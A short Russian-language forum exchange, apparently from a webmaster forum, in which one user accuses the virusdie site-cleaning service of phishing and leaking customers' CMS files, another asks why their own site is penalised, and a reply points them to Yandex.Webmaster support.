Скажите, что делать тем кто воспользовался сервисом virusdie.ru или virusdie.com или другими прокладками этого фишинга и обнаружил свою CMS в паблике на варезных сайтах?

 Dr.Web на него ругается, не рекомендует с ними связываться.

К статии пострадавшие уже отписываются на webmoney.

http://advisor.wmtransfer.com/SiteDetails.aspx?url=virusdie.ru

Извините а в чем вина моего сайта? Вроде там услуги нормально все только шаблон вам не понравился или как ? Нет серьезно что там нету полезной информации для клиентов или там плохо описаны услуги ? Скажите пожалуйста я поменяю, только бы понял в чем проблема .... не вопрос.
spinosasay,
Добрый день! По этому вопросу лучше напрямую обратиться в службу поддержки Яндекс.Вебмастера. Там смогут дать более конкретные рекомендации.